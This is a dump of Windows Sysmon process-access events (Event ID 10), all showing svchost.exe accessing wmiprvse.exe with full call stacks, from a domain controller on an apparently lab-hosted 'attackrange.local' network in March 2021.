12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.926{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.910{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
